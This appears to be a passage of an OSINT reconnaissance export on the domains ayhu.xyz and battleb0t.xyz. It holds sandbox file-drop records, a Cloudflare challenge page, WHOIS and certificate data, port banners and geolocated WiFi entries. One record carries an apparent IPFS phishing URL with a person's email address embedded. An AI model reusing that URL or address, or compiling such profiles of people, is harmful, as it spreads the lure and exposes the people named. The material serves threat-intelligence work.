(Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: 
wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""bellagracehealthscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""belleandbubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""beyondblessedscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")'}, {u'category': u'Installation/Persistence', u'origin': 
u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsbafybeicwlwkx67nkilbg2snqvejtcvrcxwsd4niel4wejzi2nyvjpsdqt4.ipfs.dweb.linkkshare.html#p.wehnert%40heathus.com" has type "HTML document ASCII text with no line terminators"- [targetUID: N/A]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006636]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00004224]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00004224]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4224_1061944327\\edge_driver.js]- [targetUID: 00000000-00004224]\n "00e7fb9a-e2bd-4691-8dd2-d2fd1ba42ccc.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 268381"- Location: [%TEMP%\\00e7fb9a-e2bd-4691-8dd2-d2fd1ba42ccc.tmp]- [targetUID: 00000000-00004224]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "f_0004c3" has type "gzip compressed data from Unix original size modulo 2^32 4586386"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c3]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006636]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4224_1061944327\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004224]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004224]\n "000013.ldb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000013.ldb]- [targetUID: 00000000-00004224]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4224_1061944327\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004224]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\4224_1061944327\\Mini-Wallet\\miniwallet.bundle.js]- [targetUID: 00000000-00004224]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\4224_1061944327\\Notification\\notification.bundle.js]- [targetUID: 00000000-00004224]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00004224]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006636]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006636]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\4224_910400663\\edge_autofill_field_data.json]- [targetUID: 00000000-00004224]\n "wallet-checkout-eligible-sites.json" has type "ASCII text"- [targetUID: 00000000-00004224]\n "wallet-checkout-eligible-sites-pre-stable.json" has type 
"ASCII text"- Location: [%TEMP%\\4224_1061944327\\json\\wallet\\wallet-checkout-eligible-sites-pre-stable.json]- [targetUID: 00000000-00004224]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004224]\n "Web Data | 185.199.108.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Private (Net ID: 00:06:B1:20:D3:D2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 2 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f603759cec44a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="VxcMRN.Povw0Dqbul8wSiWYYVjQ65KTx3XK5wkMYn5s-1683860053-0-ARNnaczlk3lhWY6ESpfReTjviWNfe6-W-F4EYUMujv5K8wYIHcmyGNVxCdUrRWsobOaE65E16LH7Z5A8l3JcOOwM40OukBYU_NTnKQTXBbuAPfHcavNAVkFXDNA4yBYP_F-doeuxJ1iDDtJRrmlmohTnm9Zwgu_y8a0NK2hiUe5yMvTqp63OLXzd1V9ueCyVeeK1caOtPi7xaty2vJtyZb-cIX-pXe1HjTUlpS2SBgDHLt9Z2nGU34h6kZ0-LrtNlJwHFMEUfGQT7Cu-pfqrhaBF1Rf57tLrkAcE4ToZFW0ZJ0AzVaQzLYE6ZtSIvjdhsInZ4x-0ac4WkaSnH9qLZC0frRaKCRbP1YE5yAsA_V_rAzDvledqs23zFkADyA1JndB-r5YTwGkwDl-BxZREbNktpruk72pVubcgN5obrf6JxTrQq7YBfyWH0u231TmHhalG3kCxQTdf9BBK1RtcvNhrrH01RN3jUXWOknSbzfs0xXZvpHYZ1mrWn-Ojnk9ZjOu2ygM5UtHSoZUS6y_CjRifM_gopebOwo_cedROZOf9quaaEku8SOVh2-a-u3HQqhJrHKvyqASEjXgOG-POuVge4L6xHx2SHahOESPnWqqKrSn9BYMIGELPd8-r-1tIAXEFuooehRGS_FYNDjqh6omsTcRWSr06JGoopCVsOBkATKY4nwfmOjHwATatO_bzDcPIKUDDZxN4trvvcVPNVoHO7Bdkn5nD4MlhG7ULR5m8BGChjHXk7lMQgvxBm1SZz89qexKer_mB3ITW_Ckfp4tPj4-YUwZkcw1lp1dwi32IJwgxwAEQrcGYo7Dftq8CYuStupr8lXKN_XUjGqTozvnpHPRsKR3mpnU05jAAbQN-wTNmylPeMG1Bx9YvJ8-oBs6FOj2g79NCurzx8d8F26PjaGqr-vtP8UKYeQxLAnNdd4Vl3r7Sxgy5_U4ONoKkZLnzYO166hvNojFJrl5f4tJq3L8oaK1eV5U-xpdOk_jlFbI7ZzjrEUv9fZQsj5GaeDY02cHxOh7Nt2nNuGIpJ43yd7IG1NCu_ks7x5I0kfXv5MRuTfiROKF9xzm5F_CKasB2amUWk6rZYcXTrxdif9TD5Sx62vXZQpsnSXx8a6qRdl0hIJb_vmia5qIkaGS9V0c3xjS-IDsjcMXU8HgYzlCX19Zu4ALj-qepP0KcZOXiHhiswQ6RmzSNTHY19R5ZletASbYV_KRC2PP48Hz8WCb-SWTTkcwOaIfpq0-9SsU16FZzuVHDtQR9HgY0pbLMzaxY0s1xIpwF0xudNUa9SsK7hj88CJhBWAgyl0DKCHjlEvVNsM3bMb76uUbrGBKt7Hry85yQS5UEcYp6GIRihakXwCelMLh9b6mQeb34LGhQRPvlmLc3f7j1216yXCSaBd223eCCMmrLoB2g3nLwqwrk_PW2t_XaPAxAsSOOJKzId4VjA2dn6CqsOQIQ1btvcUPfq3OsFea8XgUx2qTK18l8oqMYjxkPX_FOwTDrD8XvSUg990Ur0PezzJ7ZjQhXW2g96qU5HlxCcEgvTZ1Oj8VsRG6KYZKs3liq65P7yZ1Xq0PuWGs5ZH1HZuwe_EUK0ctlgYcA2TZqiqR97ljhOugKeylE_8hYvCH-_EfG3w8eyicUcZHEEbELHsNXehd76Tx3s2-ebSEw5k9zImyOFTenD_lgPbpq7QTz7xoj2el_vnfxew2WRomnN2o-3wrcdpxXZbyRqTVEwh9mt5ldOWHagonTAv_Q_hf6-IdMAwmmBbSh1Hcp5U00qxCfbSDlsw6TbCjryraM_n5MuyIQ3ROmpzau0nYDihwg55Yfm_maTyXQn3EfPcgCTbGbUA-S1IM4kEvznOEUMKan7limYnMnSACdDa6YllLFkTxfyt9PIWPkM
Fkg4rul1WrPg6PbIgC6s9asfdQz_qx66otvL3jKY2qeghrw_6pmQyfsLCIHyZFw1XaoIueMg-cFKFmIkcBABdWmDDrGq0ut54mYbYK3SFGC_bIHhtVHYt9KTDDqI94HFGgN1Tmq0OS0w3l63uBrjPR2ghPB-fwrkk0mrJ7qhhXURTs1sofuhT9GcdvnMZ1lpgzcElp3IhKAYa_lNxP8ZMf4Q_-TfeYlm0PHPqWivHEqU3GArEQlC_hJ27J0JdZxbF8RZT_qsP9FxBGCfGjgHhGcEmTtiLHMzioIBblPCJ2MJyW1yepTP1gLGj1XQw8vPq1sTASJgCcwQdtLYK1gBygsKJ6y9hq73XXqB7BxmSRGE1412ZH9kqHGFcsBJvpgdfjdZDEcUAbc7eHlE_pUs5mqrXq697Qb125fekHxboBa8kmPIcPQ2ynUBwAN74KYjxXYEmrozv8dkXJqol4LZcUANpwiA11Em8xrLpc2lbtTgwaNEHGyTh_5AUbuVj2YXAm8gMv0JlcPNtTwFxCdA8SE7rXhlJ4zCoy8DSlgGYlbvZ8ijwcet19cfaphrxuan5NDwsNqQSGBQBD2ZBY7HKWcOtfFA0IzjpULqXe_VhCzD0_t3-f5YJ6XZO21">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '16187',
cRay: '7c5f603759cec44a',
cHash: '5c1bdda96dc3363',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA1My42NjAwMDA=',
m: 'lfsFj6DGCrI2vGPf6BjuX9qKC3b3WJbZzI/myE7y0Ig=',
i1: 'Gu/vYOwR5DI39saTFLv/iA==',
i2: 'jBLnZ6zLXxRsowEZI/3brw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f603759cec44a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f603759cec44a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8001::153 | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:50:3C:2C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:02:2D:26:4A:A6) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | darudar (Category: misc)
https://darudar.org/users/login/ | login |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RyanLG (Net ID: 00:01:36:4F:9A:F0) | 37.780462,-122.390564 |
| 2023-05-12 02:56:54 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | keyubu.net | cp.keyubu.net |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 34.148.96.0/20 |
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:80 | 188.114.96.0/24 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.92): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14806242598 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/ein_2.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:44:34 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:46:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip Wavelan (Net ID: 00:02:2D:01:79:94) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ea2e0298c1146-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 02:53:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.153:80 | 185.199.111.0/24 |
| 2023-05-12 03:10:57 | Raw Data from RIRs | No | Keybase | 0 | 0 | 6 | 0 | None | {u'status': {u'code': 0, u'name': u'OK'}, u'them': [{u'basics': {u'username': u'login', u'track_version': 0, u'ctime': 1437685663, u'last_id_change': 1437685663, u'username_cased': u'login', u'eldest_seqno': 0, u'status': 0, u'id_version': 0, u'mtime': 1565618750, u'salt': u'bfd095bd7481b265726bbe1cf8806782'}, u'devices': {}, u'stellar': {u'hidden': False, u'primary': {}}, u'cryptocurrency_addresses': {}, u'public_keys': {u'eldest_kid': None, u'eldest_key_fingerprint': None, u'families': {}, u'subkeys': [], u'sibkeys': [], u'all_bundles': [], u'pgp_public_keys': []}, u'id': u'428821350e9691491f616b754cd83119', u'proofs_summary': {u'all': [], u'has_web': False, u'by_sig_id': {}, u'by_presentation_group': {}}}]} | login |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.158): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Domains By Proxy, LLC | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
